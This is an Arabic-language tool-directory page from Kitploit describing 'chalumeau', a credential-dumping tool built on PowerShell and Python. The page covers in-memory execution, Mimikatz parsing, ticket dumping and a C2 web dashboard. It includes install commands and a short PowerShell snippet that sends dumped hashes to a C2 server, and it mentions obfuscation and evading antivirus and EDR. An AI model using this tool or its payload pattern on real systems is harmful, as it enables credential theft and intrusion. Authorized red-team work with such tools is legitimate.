Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
chalumeau — Chalumeau هي أداة سحب بيانات الاعتماد أوتوماتيكية,قابلة للتوسيع والتخصيص تعتمد على powershell و python. | Kitploit
أدوات/GitHubGitHub/cyberstruggle/chalumeau
هجمات كلمات المرورما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالفريق الأحمرتطوير الحمولات
GitHubcyberstruggle/chalumeau

chalumeau

Chalumeau هي أداة سحب بيانات الاعتماد أوتوماتيكية,قابلة للتوسيع والتخصيص تعتمد على powershell و python.

عرض المستودع
10219منذ 6 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة


Chalumeau

Chalumeau هي أداة استخراج بيانات الاعتماد آلية وقابلة للتوسيع والتخصيص مبنية على PowerShell وPython.

الميزات الرئيسية

  • اكتب حمولاتك الخاصة
  • التنفيذ في الذاكرة
  • استخراج قائمة كلمات المرور
  • تقارير لوحة القيادة / واجهة ويب
  • تحليل Mimikatz
  • تفريغ التذاكر

لقطات الشاشة


المشكلات المعروفة

  • تحليل Mimikatz dcsync (جارٍ العمل على الإصلاح)
  • تجاوز مضادات الفيروسات وأنظمة كشف الاستجابة (EDRs)، ستحتاج إلى صيانة حمولاتك

المهام المستقبلية

  • اتصال مشفر
  • حركة جانبية آلية
  • رش كلمات المرور آليًا
  • كسر التجزئات آليًا

الاستخدام

root@kitploit:~
git clone https://github.com/cyberstruggle/chalumeau.git
cd chalumeau/
chmod +x install.sh
sudo ./install.sh

# تشغيل
chmod +x start.sh

sudo ./start.sh

كتابة حمولتك الخاصة

قم بتشويش حمولة PowerShell الخاصة بك لتفريغ بيانات الاعتماد واستخدام دالة Chalumeau دون أي استيرادات. ستقوم Chalumeau بتشفير والاتصال بالـ C2 وإرسال بيانات الاعتماد المفروغة. فقط احفظ الملف تحت المجلد chalumeau-power/payloads

  • استخدام دالة ChalumeauSendCredentials
    • ChalumeauSendCredentials
      • Secret = التجزئة المفروغة أو كلمة المرور النصية الصريحة (string)
      • Username = اسم المستخدم أو معرف بيانات الاعتماد المفروغة (string)
      • IsClearText = 1 إذا كان نصًا صريحًا 0 إذا لم يكن (int)
      • Source = اذكر مصدر الحمولة مثل "Mimikatz Hash" (string)
root@kitploit:~
# Custom Payload Example
# $DumpedHashes is array of dumped hashes from the local machine
foreach ($hash in $DumpedHashes){
    ChalumeauSendCredentials -Secret $hash.secret -Username $hash.user -IsClearText 0 -source "My custom payload"
} 

الإسناد

  • wazehell Author
  • Invoke-Obfuscation Daniel Bohannon
  • Invoke-Mimikatz PowerSploit
  • Get-PassHashes nishang
  • Chalumeau Logo Aureliano
  • Invoke-MassMimikatz PowerTools
تنزيل الأداة